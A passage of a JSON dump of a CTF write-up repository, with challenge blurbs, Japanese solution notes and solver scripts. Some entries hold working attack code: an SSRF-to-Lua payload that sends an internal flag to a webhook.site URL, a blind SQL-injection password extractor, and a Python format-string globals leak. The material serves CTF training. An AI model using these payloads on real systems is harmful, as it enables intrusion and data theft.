`xnqsfv`\n\n---\n\n復号化するためには、辞書`S_box`の逆対応表があればよい。(`he`⇒`de`が暗号化なら`de`⇒`he`は復号化)\n\nただし`len(message)=2`のとき、2回暗号化されてしまうため、単純に逆にすれば求まるわけではない。((input)`he`⇒`de`⇒`??`(output))\n\n暗号化の方式は俗にいうブロック暗号なので、何か解読手段はないかと模索...\n\n* https://ja.wikipedia.org/wiki/ブロック暗号#ショートカット法\n\n# Solution\n\n**[writeup]**\n\n> for queensarah2, you can do a slide attack, or sqrt the permutation.\n>\n> slide attack was intended soln i think: \n>> https://www.robertxiao.ca/hacking/sarah2/\n>\n> solve script for queensarah2\n>> https://github.com/captainGeech42/ctf-writeups/tree/master/pbctf2020/queensarah2\n>\n> [via Discord](https://discord.com/channels/748672086838607943/785302038606643231/785453953970208768)\n\n\n> Here's my writeup for queensarah2 \n>> https://github.com/qxxxb/ctf/tree/master/2020/pbctf/queensarah2. \n>\n>I tried to explain the crypto clearly even tho my script is really bad :smiling_face_with_tear:\n>\n> [via Discord](https://discord.com/channels/748672086838607943/785302038606643231/785608839013597213)\n\n> https://project-euphoria.netlify.app/blog/9-pbctf-2020/\n\n2番目のwriteupが図で説明されていてわかりやすい。\n\n`odd cycle`にうまく当てはまれば`S_box`を復元できるので、復号化できるようになる。\n\n# Comment\n\n一番シンプルな2文字の置換に着目した点はよかった。同じアルゴリズムでも確率次第でうまくいく/いかないがある問題が出題されること分かった。" }, { "alpha_fraction": 0.6690140962600708, "alphanum_fraction": 0.7992957830429077, "avg_line_length": 94, "blob_id": "d86452261a746cee95b1b04d491aeb1bfd3a69cd", "content_id": "774c086ad304988b5c5bb0b6d3bf76e3ad1346ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 284, "license_type": "no_license", "max_line_length": 265, "num_lines": 3, "path": "/2021/angstromCTF_2021/sosig/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Oh man, RSA is so cool. But I don't trust the professionals, I do things MY WAY. And I'll make my encryption EXTRA secure with an extra thicc e! You'll never crack [it](https://files.actf.co/70085a9944d5441143ecc6ecb90b9ff7d16f300d81eccc513c737cd83fa1eeab/out.txt)!\n\nAuthor: preterite" }, { "alpha_fraction": 0.6836734414100647, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 31.75, "blob_id": "2b007118128ffc1d7cdf819faf6a80faaa9deb39", "content_id": "4192a66efec1e7fb707fcff81c501cfaa0db6968", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 392, "license_type": "no_license", "max_line_length": 64, "num_lines": 12, "path": "/2020/KipodAfterFreeCTF/SSE_KEYGENME/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import angr\n\np = angr.Project('SSE_KEYGENME')\nmain_addr = p.loader.main_object.get_symbol('main').rebased_addr\nprint('main_addr = ',main_addr)\nstate = p.factory.entry_state()\nsim = p.factory.simulation_manager(state)\naddr_success = main_addr + (0xD48-0xC6D)\n# addr_failed = main_addr + (0xD4F-0xC6D)\nsim.explore(find=addr_success)\nif len(sim.found) > 0:\n print(sim.found[0].posix.dumps(0))" }, { "alpha_fraction": 0.6456834673881531, "alphanum_fraction": 0.7338129281997681, "avg_line_length": 31.764705657958984, "blob_id": "dd06ecc381c9c197d6e44f891a5f326822f7d943", "content_id": "c2b04a0e92b74919bfafc9ec7b16f6d130042384", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 556, "license_type": "no_license", "max_line_length": 130, "num_lines": 17, "path": "/2020/pbctf_2020/Sploosh/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Original\n# https://gist.github.com/u0pattern/92c01201e4f6b7139ba7e72c734afb1f\n\nimport requests\nfrom urllib.parse import quote\n\nlua=\"\"\"\nfunction main(splash)\n local treat = require(\"treat\")\n local json = splash:http_get('http://172.16.0.14/flag.php')\n local response=splash:http_get('https://webhook.site/25760c6e-5ef1-42f7-b8e1-bae8e3abbf4b?flag='.. treat.as_string(json.body))\nend \n\"\"\"\n \nurl='http://sploosh.chal.perfect.blue/api.php?url=http://splash:8050/execute?lua_source='+quote(lua)\nresponse=requests.get(url)\nprint(response.text)" }, { "alpha_fraction": 0.4503968358039856, "alphanum_fraction": 0.5615079402923584, "avg_line_length": 17.035715103149414, "blob_id": "a078a1d8a868476e00acd0054ff020c5e7010553", "content_id": "9d4c1e84a660d954ec66fccc5ebb045e7576f340", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 506, "license_type": "no_license", "max_line_length": 117, "num_lines": 28, "path": "/2021/Real_World_CTF_3rd/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Real World CTF 3rd\n\n* https://realworldctf.com/\n\n* 2021/01/09 11:00 JST — 2021/01/11 11:00 JST\n\n> M4x 2021/01/11\n> Another link if you want challenge attachments: https://github.com/chaitin/Real-World-CTF-3rd-Challenge-Attachments\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| ------- | ------------ | ------- | ----: | -----: |\n| checkin | [HOME](HOME) | welcome | 41 | 256 |\n\n### Unsolved\n\n---\n\n## Result\n\n* 41 points\n\n* 259 / 270 (> 1 pt)\n\n* 259 / 1772" }, { "alpha_fraction": 0.6842105388641357, "alphanum_fraction": 0.7736842036247253, "avg_line_length": 26.285715103149414, "blob_id": "0fa5105e8cec84879eb8ddce3eab865bbddd0d77", "content_id": "e127f7c0d5dcdc3fd05ca8a661677931328e2743", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 220, "license_type": "no_license", "max_line_length": 79, "num_lines": 7, "path": "/2020/kksctf_open_2020/motor_sounds/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Жжжжжжжжжж, виииив, виииив, жжжжжжжж...\n\nZhzhzhzhzhzhzhzhzhzh, viiiiv, viiiiv, zzhzhzhzhzhzhzh ...\n\n[file](https://tasks.kksctf.ru/tasks/b15bd0dd-fd54-4112-8ba6-aade2a4b6414/file)\n\n@bork_dog" }, { "alpha_fraction": 0.6710526347160339, "alphanum_fraction": 0.7960526347160339, "avg_line_length": 49.66666793823242, "blob_id": "d7653257718bbe6e12356f649454b4c48c2134a3", "content_id": "8772340a9f65ebed6b674a6a1ff3956aacef473c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 152, "license_type": "no_license", "max_line_length": 110, "num_lines": 3, "path": "/2021/RaRCTF_2021/Secure_Uploader/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "A new secure, safe and smooth uploader!\n\n[secup.zip - f8db2a](https://files-ctf.rars.win/challenge-files/12/f8db2a03ecb1dcd6f44259fd9aade975/secup.zip)\n" }, { "alpha_fraction": 0.46915459632873535, "alphanum_fraction": 0.5247524976730347, "avg_line_length": 24.745098114013672, "blob_id": "83aa3035dfdccc1b3d09b12656e0acae3b2c2f40", "content_id": "2ccbd59520b9b1e52184beb73813b20d0bed8ec2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1431, "license_type": "no_license", "max_line_length": 113, "num_lines": 51, "path": "/2021/ImaginaryCTF_2021/Formatting/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のプログラムが与えられる。\n\n```py\n#!/usr/bin/env python3\n\nart = '''\n 88\n ,d 88\n 88 88\n,adPPYba, MM88MMM ,adPPYba, 8b,dPPYba, 88 ,d8 ,adPPYba,\nI8[ \"\" 88 a8\" \"8a 88P' `\"8a 88 ,a8\" I8[ \"\"\n `\"Y8ba, 88 8b d8 88 88 8888[ `\"Y8ba,\naa ]8I 88, \"8a, ,a8\" 88 88 88`\"Yba, aa ]8I\n`\"YbbdP\"' \"Y888 `\"YbbdP\"' 88 88 88 `Y8a `\"YbbdP\"'\n'''\n\nflag = open(\"flag.txt\").read()\n\nclass stonkgenerator: # I heard object oriented programming is popular\n def __init__(self):\n pass\n def __str__(self):\n return \"stonks\"\n\ndef main():\n print(art)\n print(\"Welcome to Stonks as a Service!\")\n print(\"Enter any input, and we'll say it back to you with any '{a}' replaced with 'stonks'! Try it out!\")\n while True:\n inp = input(\"> \")\n print(inp.format(a=stonkgenerator()))\n\nif __name__ == \"__main__\":\n main()\n```\n\n`print(inp.format(a=stonkgenerator()))`の部分で`flag`を表示させれば良さそう。\n\n* [Vulnerability in str.format() in Python](https://www.geeksforgeeks.org/vulnerability-in-str-format-in-python/)\n\n上記サイトの通り、\n\n```\n{a.__init__.__globals__[flag]}\n```\n\nを入力したところ、フラグが出力された。\n\n<!-- ictf{c4r3rul_w1th_f0rmat_str1ngs_4a2bd219} -->\n" }, { "alpha_fraction": 0.5297029614448547, "alphanum_fraction": 0.5313531160354614, "avg_line_length": 30.947368621826172, "blob_id": "ce4613905f0955e2c4babe73dff99854c869e3ef", "content_id": "d03cad562919ce54cdf1b46bed9109442cf08972", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 606, "license_type": "no_license", "max_line_length": 94, "num_lines": 19, "path": "/2021/WaniCTF21-spring/watch_animal/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import requests\nimport string\n\nwith requests.Session() as session:\n r = session.get(\"https://watch.web.wanictf.org/\")\n chars = string.printable\n chars = chars.replace('%','')\n chars = chars.replace('_','')\n password = \"\"\n while True:\n for c in chars :\n data = {'email':'[email protected]', 'password': \"' OR password LIKE '\"+ password + c + \"%\"}\n r = session.post(\"https://watch.web.wanictf.org/\",data=data)\n if \"Login Failed...\" not in r.text :\n break\n if c == chars[-1]:\n break\n password += c\n print(password)" }, { "alpha_fraction": 0.837837815284729, "alphanum_fraction": 0.837837815284729, "avg_line_length": 26, "blob_id": "21d2cfbcbd62d4246c11759be04fdd439d942cb1", "content_id": "5616cb388274e07797272d74c430a48cc38de416", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 460, "license_type": "no_license", "max_line_length": 93, "num_lines": 11, "path": "/2020/WaniCTF/logged_flag/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "ワニ博士が問題を作っていたので、作っているところをキーロガーで勝手に記録してみました。\n\n先に公開してしまいたいと思います。\n\n(ワニ博士は英字配列のキーボードを使っています)\n\n[key_log.txt](https://score.wanictf.org/storage/mxzwrxngbjjguotyxlsygefbhbwfhzik/key_log.txt)\n\n[secret.jpg](https://score.wanictf.org/storage/clijmiiqmqkmyodhdflxrnlkuusllajk/secret.jpg)\n\nWriter : takushooo" }, { "alpha_fraction": 0.6289308071136475, "alphanum_fraction": 0.7610062956809998, "avg_line_length": 25.5, "blob_id": "0873588dfc7f34beaf3ef2fbe204b74350b7e582", "content_id": "29880fda6e1d91f7b5845004e3c96f8712fa47df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 159, "license_type": "no_license", "max_line_length": 100, "num_lines": 6, "path": "/2021/HeroCTF_v3/Russian_Doll/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Go deeper !\n\nFormat : Hero{}\nAuthor : Enarior / xanhacks\n\n[archive.zip](https://www.heroctf.fr/files/0de4173c5ed705183aa56eba216325a5/archive.zip?token=eyJ1c2VyX2lkIjoxMzgyLCJ0ZWFtX2lkIjo3NDYsImZpbGVfaWQiOjIwfQ.YIUu7Q.fHNGLbyn8rBYdgupVBxHVqJsHH4)\n" }, { "alpha_fraction": 0.704960823059082, "alphanum_fraction": 0.7232375741004944, "avg_line_length": 13.222222328186035, "blob_id": "20cda18c43b4946ef7b0a15cb219e718e0dfebca", "content_id": "c8bbfb0ac574a17ae9aa1807006d2abbd9edb2b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 575, "license_type": "no_license", "max_line_length": 82, "num_lines": 27, "path": "/2020/kksctf_open_2020/not_a_terminator/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Not solved :(\n\n# Try\n\n以下の画像が与えられる。\n\n![](pic.png)\n\nしかし、法則がわからなかったので解けず。\n\n問題タイトルの`terminator`、 問題文の`Arnie = Arnold (Schwarzenegger)` がヒントかな...?\n\n# Solution\n\n**[writeup]**\n\n* https://github.com/hackalcubo/CTF-Writeups/tree/main/kksctf2020/not_a_terminator\n\nどうやら映画「エイリアンvsプレデター」のプレデターのフォントらしい。\n\n* https://fonts2u.com/predator.font\n\n<!-- kks{Y0uNgArni3IsCoOl} -->\n\n# Comment\n\nググり力が足りなかった。" }, { "alpha_fraction": 0.5952879786491394, "alphanum_fraction": 0.6738219857215881, "avg_line_length": 33.125, "blob_id": "88f1d5fbf28387ecc179aab1b6f88ebeeff5e03a", "content_id": "5e4a20dc3cfaddd69075bed406a99a87c5637a17", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1958, "license_type": "no_license", "max_line_length": 80, "num_lines": 56, "path": "/2020/WaniCTF/ALLIGATOR_02/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n`Volatility`を使ってコマンドプロンプトの出力を確認する。\n\n[参考]\n\n* https://troushoo.blog.fc2.com/blog-entry-174.html\n\n```bash\n$ vol.py -f ALLIGATOR.raw --kdbg=0x82754de8 --profile=Win7SP1x86_23418 consoles\n\nConsoleProcess: conhost.exe Pid: 336\nConsole: 0x4f81c0 CommandHistorySize: 50\nHistoryBufferCount: 2 HistoryBufferMax: 4\nOriginalTitle: C:\\Program Files\\OpenSSH\\bin\\cygrunsrv.exe\nTitle: C:\\Program Files\\OpenSSH\\bin\\cygrunsrv.exe\nAttachedProcess: sshd.exe Pid: 856 Handle: 0x54\n----\nCommandHistory: 0xb0960 Application: sshd.exe Flags: Allocated\nCommandCount: 0 LastAdded: -1 LastDisplayed: -1\nFirstCommand: 0 CommandCountMax: 50\nProcessHandle: 0x54\n----\nCommandHistory: 0xb07f0 Application: cygrunsrv.exe Flags: \nCommandCount: 0 LastAdded: -1 LastDisplayed: -1\nFirstCommand: 0 CommandCountMax: 50\nProcessHandle: 0x0\n----\nScreen 0xc6098 X:80 Y:300\nDump:\n\n**************************************************\nConsoleProcess: conhost.exe Pid: 3736\nConsole: 0x4f81c0 CommandHistorySize: 50\nHistoryBufferCount: 1 HistoryBufferMax: 4\nOriginalTitle: %SystemRoot%\\system32\\cmd.exe\nTitle: Administrator: C:\\Windows\\system32\\cmd.exe\nAttachedProcess: cmd.exe Pid: 3728 Handle: 0x5c\n----\nCommandHistory: 0x350440 Application: cmd.exe Flags: Allocated, Reset\nCommandCount: 1 LastAdded: 0 LastDisplayed: 0\nFirstCommand: 0 CommandCountMax: 50\nProcessHandle: 0x5c\nCmd #0 at 0x3546d8: type C:\\Users\\ALLIGATOR\\Desktop\\flag.txt\n----\nScreen 0x3363b8 X:80 Y:300\nDump:\nMicrosoft Windows [Version 6.1.7601] \nCopyright (c) 2009 Microsoft Corporation. All rights reserved. \n \nC:\\Users\\ALLIGATOR>type C:\\Users\\ALLIGATOR\\Desktop\\flag.txt \nFLAG{y0u_4re_c0n50les_master} \nC:\\Users\\ALLIGATOR> \n```\n\n<!-- FLAG{y0u_4re_c0n50les_master} -->" }, { "alpha_fraction": 0.30571991205215454, "alphanum_fraction": 0.36785009503364563, "avg_line_length": 32.83333206176758, "blob_id": "05d821e0cae070f16aed6e861bea7f905ddc4310", "content_id": "b8bef204b38457da201559a5d17d1a79192d8cc1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1017, "license_type": "no_license", "max_line_length": 99, "num_lines": 30, "path": "/2020/kksctf_open_2020/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# #kksctf open 2020\n\n* https://open.kksctf.ru/\n\n* 2020/12/12 18:00 JST — 2020/12/13 18:00 JST\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| ------ | -------------------------------------- | ---------------------------- | ----: | -----: |\n| Crypto | [fonction_spéciale](fonction_speciale) | Look(Count)-and-say sequence | 240 | 91 |\n| Web | [Lynx](Lynx) | Lynx, robots.txt | 204 | 113 |\n| Misc | [motor_sounds](motor_sounds) | G-code | 268 | 77 |\n\n### Unsolved\n\n| tag | problem | comment | score | solved |\n| ------ | ------------------------------------ | ----------- | ----: | -----: |\n| Crypto | [not_a_terminator](not_a_terminator) | guessing | 523 | 17 |\n| Misc | [bson](bson) | MessagePack | 331 | 53 |\n\n---\n\n## Result\n\n* 722 points\n\n* 81 / 229 (> 1 pt)" }, { "alpha_fraction": 0.598870038986206, "alphanum_fraction": 0.7796609997749329, "avg_line_length": 58, "blob_id": "7fb5dff14f188e562d19330c6a54cbab96c7a4d0", "content_id": "17cd11285e843e10bc703a26f89a81b98cbfb106", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 177, "license_type": "no_license", "max_line_length": 104, "num_lines": 3, "path": "/2021/RaRCTF_2021/Archer/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "It's battle time! We're giving you one shot, one kill - choose wisely.\n\n[archer - 056a06](https://files-ctf.rars.win/challenge-files/11/056a064c0693321df2783871fb9228a5/archer)\n" }, { "alpha_fraction": 0.48230770230293274, "alphanum_fraction": 0.5761538743972778, "avg_line_length": 19, "blob_id": "12554c5cf07298ede3f4f0f9d9cfacd11bb26f30", "content_id": "2308a0d5f6f027782bc03f1e14fd2c0d1bbf8afd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1460, "license_type": "no_license", "max_line_length": 114, "num_lines": 65, "path": "/2021/BCACTF_2.0/Wasm_Protected_Site_1/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nhttp://web.bcactf.com:49157/ にアクセスする。\n\nパスワード入力フォームが表示されるので、適当に入力してみる。\n\n![](img/2021-06-13-14-20-52.png)\n\nソース周りを調べると、`wasm`というファイルを見つけた。\n\n```wasm\n(module\n (memory $memory (;0;) (export \"memory\") 1)\n (func $compareString (;0;) (export \"compareString\") (param $str1 (;0;) i32) (param $str2 (;1;) i32) (result i32)\n (local $index (;2;) i32)\n loop $label0\n local.get $index\n local.get $str1\n i32.add\n i32.load8_u\n local.get $index\n local.get $str2\n i32.add\n i32.load8_u\n i32.ne\n if\n i32.const 0\n return\n end\n local.get $index\n local.get $str1\n i32.add\n i32.load8_u\n if\n local.get $index\n i32.const 1\n i32.add\n local.set $index\n br $label0\n end\n i32.const 1\n return\n end $label0\n i32.const 0\n return\n )\n (func $checkPassword (;1;) (export \"checkPassword\") (param $addr (;0;) i32) (result i32)\n block $label0\n local.get $addr\n i32.const 1040\n call $compareString\n br_if $label0\n i32.const 1000\n return\n end $label0\n i32.const 1016\n return\n )\n (data (i32.const 1000) \"INVALIDPASSWORD\\00bcactf{w4sm-m4g1c-xRz5}\\00WASMP4S5W0RD\\00\")\n)\n```\n\nここにそのままフラグが書かれていた。\n\n<!-- bcactf{w4sm-m4g1c-xRz5} -->\n" }, { "alpha_fraction": 0.6221009492874146, "alphanum_fraction": 0.6357434988021851, "avg_line_length": 17.794872283935547, "blob_id": "1d74e248a82666446ebd9ec6dbc104bc358c4ae7", "content_id": "acbdd83431c6c050074a41abac14654c0652c258", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 761, "license_type": "no_license", "max_line_length": 38, "num_lines": 39, "path": "/2020/WaniCTF/Basic_RSA/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\nfrom Crypto.Util.number import inverse\n\nconn = remote('rsa.wanictf.org',50000)\n\n# 第1段階\nconn.recvuntil('p = ')\np = int(conn.recvline())\nconn.recvuntil('q = ')\nq = int(conn.recvline())\nn = p * q\nconn.sendline(str(n))\n\n# 第2段階\nconn.recvuntil('m = ')\nm = int(conn.recvline())\nconn.recvuntil('e = ')\ne = int(conn.recvline())\nconn.recvuntil('n = ')\nn = int(conn.recvline())\nc = pow(m,e,n)\nconn.sendline(str(c))\n\n# 第3段階\nconn.recvuntil('p = ')\np = int(conn.recvline())\nconn.recvuntil('q = ')\nq = int(conn.recvline())\nconn.recvuntil('e = ')\ne = int(conn.recvline())\nconn.recvuntil('c = ')\nc = int(conn.recvline())\nd = inverse(e,(p-1)*(q-1))\nm = pow(c,d,p*q)\nconn.sendline(str(m))\n\n# フラグ出力\nprint(conn.recvline())\nconn.close()\n" }, { "alpha_fraction": 0.6141906976699829, "alphanum_fraction": 0.7671840190887451, "avg_line_length": 22.789474487304688, "blob_id": "18313584bf66768f8d21414b3fc4ccf2dc5fc832", "content_id": "303f1ce31148ce5c99350b8198b3ab4cd2f2a9c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 719, "license_type": "no_license", "max_line_length": 99, "num_lines": 19, "path": "/2020/kksctf_open_2020/Lynx/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nリンク先にブラウザ(Chrome)でアクセスすると以下のように表示される。\n\n![](img/2020-12-13-12-58-24.png)\n\nCLIベースのWebブラウザである`Lynx`を使えばアクセスできそう。\n\n* https://ja.wikipedia.org/wiki/Lynx_(ウェブブラウザ)\n\nLynxでこのページへアクセスすると、内容が表示される。\n\n![](img/2020-12-13-13-04-04.png)\n\n次に、`http://tasks.kksctf.ru:30070/robots.txt`にアクセスすると、`/a4d81e99fda29123aee9d4bb`というディレクトリがあることがわかる。\n\n`http://tasks.kksctf.ru:30070/a4d81e99fda29123aee9d4bb`にアクセスしたらフラグが得られた。\n\n<!-- kks{s0m3_CLI_br0ws3rs_4r3_us3ful} -->" }, { "alpha_fraction": 0.6866764426231384, "alphanum_fraction": 0.7086383700370789, "avg_line_length": 55.91666793823242, "blob_id": "b2304fdad2a9539a55b75811befce23d836f1375", "content_id": "500f0d42355bcdc171ff2546ee658b1416567c2d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 683, "license_type": "no_license", "max_line_length": 132, "num_lines": 12, "path": "/2021/WeCTF_2021/CSP_1/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Shame on Shou if his web app has XSS vulnerability. More shame on him if he does not know how to use CSP correctly. \n \nThis challenge requires user interaction. Send your payload to [uv.ctf.so](https://uv.ctf.so/) Flag is in cookies of admin (Shou). \n \nHint: Search Content-Security-Policy if you don't know what that is and check your browser console.\n\nHost 1 (San Francisco): [csp1.sf.ctf.so](http://csp1.sf.ctf.so/) \nHost 2 (Los Angeles): [csp1.la.ctf.so](http://csp1.la.ctf.so/) \nHost 3 (New York): [csp1.ny.ctf.so](http://csp1.ny.ctf.so/) \nHost 4 (Singapore): [csp1.sg.ctf.so](http://csp1.sg.ctf.so/)\n\n[Source Code](https://storage.googleapis.com/wectf21-chall/csp1.zip)\n" }, { "alpha_fraction": 0.4751131236553192, "alphanum_fraction": 0.4871794879436493, "avg_line_length": 24.5, "blob_id": "4554da9b3896190438f414994bca5e2c5f77a741", "content_id": "01071248b5bc9acc15382c22cfb118987ca5b09e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 663, "license_type": "no_license", "max_line_length": 54, "num_lines": 26, "path": "/2021/WaniCTF21-spring/Easy/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import itertools\n\ndef encrypt(plaintext: str, a: int, b: int) -> str:\n ciphertext = \"\"\n for x in plaintext:\n if \"A\" <= x <= \"Z\":\n x = ord(x) - ord(\"A\")\n x = (a * x + b) % 26\n x = chr(x + ord(\"A\"))\n ciphertext += x\n\n return ciphertext\n\nif __name__ == \"__main__\":\n ciphertext = \"HLIM{OCLSAQCZASPYFZASRILLCVMC}\"\n\n for i,j in itertools.product(range(26),range(26)):\n c = encrypt(\"FLAG{\", a=i, b=j)\n if c == \"HLIM{\":\n break\n\n for _ in range(26):\n ciphertext = encrypt(ciphertext,a=i, b=j)\n if \"FLAG{\" in ciphertext:\n print(ciphertext)\n break\n" }, { "alpha_fraction": 0.6834170818328857, "alphanum_fraction": 0.80402010679245, "avg_line_length": 38.79999923706055, "blob_id": "3d08e3d07edbfaa305c6fb1e81772f55449709f2", "content_id": "6deb921a494995f39f4ceb4f24dd4f8e79ef70b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 199, "license_type": "no_license", "max_line_length": 89, "num_lines": 5, "path": "/2021/DawgCTF_2021/The_Obligatory_RSA_Challenge/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Would you believe last year someone complained because we didn't have any RSA challenges?\n\nAuthor: trashcanna\n\n[rsa.txt](https://umbccd.io/files/4d9b8700f3b31d672989a24363420ce8/rsa.txt?token=eyJ1c2VyX2lkIjoxMjg1LCJ0ZWFtX2lkIjo3MzgsImZpbGVfaWQiOjE4fQ.YJYXcw.s3Y6r-haOM1_6F0S2jOJD7iejSY)\n" }, { "alpha_fraction": 0.483091801404953, "alphanum_fraction": 0.5024154782295227, "avg_line_length": 14.923076629638672, "blob_id": "6a148543ffc87123173e90ebeaa7d4f8f9f3ee3c", "content_id": "c5889c3d6721883c4ef8d13cd812065a9d918190", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 207, "license_type": "no_license", "max_line_length": 38, "num_lines": 13, "path": "/2021/redpwnCTF_2021/round-the-bases/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from Crypto.Util.number import *\n\nc = open('round-the-bases','r').read()\nc = c.split('7D')\n\nb = ''\nfor d in c:\n if 'IIcu' in d:\n b += '0'\n else:\n b += '1'\n\nprint(long_to_bytes(int(b,2)))\n" }, { "alpha_fraction": 0.5141993761062622, "alphanum_fraction": 0.6574018001556396, "avg_line_length": 25.26984214782715, "blob_id": "d6f654277b6bd5540b58e2531a2300f8c69e01e0", "content_id": "9a73cb3ef85ae2d8476680174f2a3a1c48833fb5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1933, "license_type": "no_license", "max_line_length": 222, "num_lines": 63, "path": "/2021/BCACTF_2.0/Wait_this_isnt_C/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n実行ファイルが与えられる。\n\n```bash\n$ file flag_checker_1\nflag_checker_1: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=44db315a94752488b3ace72816fef8393c9db3fd, for GNU/Linux 3.2.0, not stripped\n```\n\nGhidraで解析する。以下、while中のif文に入らないような条件を探る。\n\n```c\n while (local_a < 0x1a) {\n auStack168[(long)local_a + -1] = local_a + auStack168[(long)local_a + -1];\n if (auStack168[(long)local_a + -1] != local_48[(long)local_a + -1]) {\n local_2b0 = \"flag_checker_1.f90\";\n local_2a8 = 0x2b;\n local_2b8 = 0x80;\n local_2b4 = 6;\n _gfortran_st_write(&local_2b8);\n _gfortran_transfer_character_write(&local_2b8,\"Sorry, flag does not match.\",0x1b);\n _gfortran_st_write_done(&local_2b8);\n _gfortran_exit_i4(&DAT_00102054);\n }\n local_a = local_a + 1;\n }\n local_2b0 = \"flag_checker_1.f90\";\n local_2a8 = 0x30;\n local_2b8 = 0x80;\n local_2b4 = 6;\n _gfortran_st_write(&local_2b8);\n _gfortran_transfer_character_write(&local_2b8,\"Congrats, that was the flag!\",0x1c);\n _gfortran_st_write_done(&local_2b8);\n return;\n```\n\nまず、if文の中に入らないようにバイナリエディタを使ってJZをJMPに書き換える。\n\n```\n001013c2 74 76 JZ LAB_0010143a\n\n↓\n\n001013c2 EB 76 JMP LAB_0010143a\n```\n\n値を変えて、レジスタの中身を確認してみたところ、if文に差し掛かった時の`RCX+RAX-RDX`の値が`flag`になっていそうなので1文字ずつ表示する。\n\n```gdb\nb *(MAIN__)+0x13bf-0x11b9\ndisp $rcx+$rax-$rdx\n```\n\n```py\nflag=[0x62,0x63,0x61,0x63,0x74,0x66,0x7b,0x66,0x30,0x72,0x74,0x72,0x34,0x4e,0x5f,0x69,0x35,0x5f,0x63,0x30,0x6f,0x4f,0x30,0x6c,0x7d]\n\nfor f in flag:\n print(chr(f),end='')\n```\n\nフラグが得られた。\n\n<!-- bcactf{f0rtr4N_i5_c0oO0l} -->\n" }, { "alpha_fraction": 0.45093944668769836, "alphanum_fraction": 0.46972858905792236, "avg_line_length": 16.10714340209961, "blob_id": "f44833564d437d6f2e0751d3063facef7421261f", "content_id": "c67465669cbd4a947eec3e686f6a41b2fa0bb5ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 479, "license_type": "no_license", "max_line_length": 40, "num_lines": 28, "path": "/2020/CyberSecurityRumble2020/Zeh/haupt_trans.c", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdlib.h>\n#include \"fahne.h\"\n\n#define forloop(n) for (int i = n; i--;)\n#define rightshift(n, m) (n) >> (m)\n#define xor(n, m) (n) ^ (m)\n\nvoid main(void) {\n int i = rand();\n int k = 13;\n int e;\n int * p = & i;\n\n printf(\"%d\\n\", i);\n fflush(stdout);\n scanf(\"%d %d\", & k, & e);\n\n forloop(7)\n k = rightshift(* p, k % 3);\n\n k = xor(k, e);\n\n if(k == 53225)\n puts(Fahne);\n else\n puts(\"War wohl void!\");\n}\n" }, { "alpha_fraction": 0.4502262473106384, "alphanum_fraction": 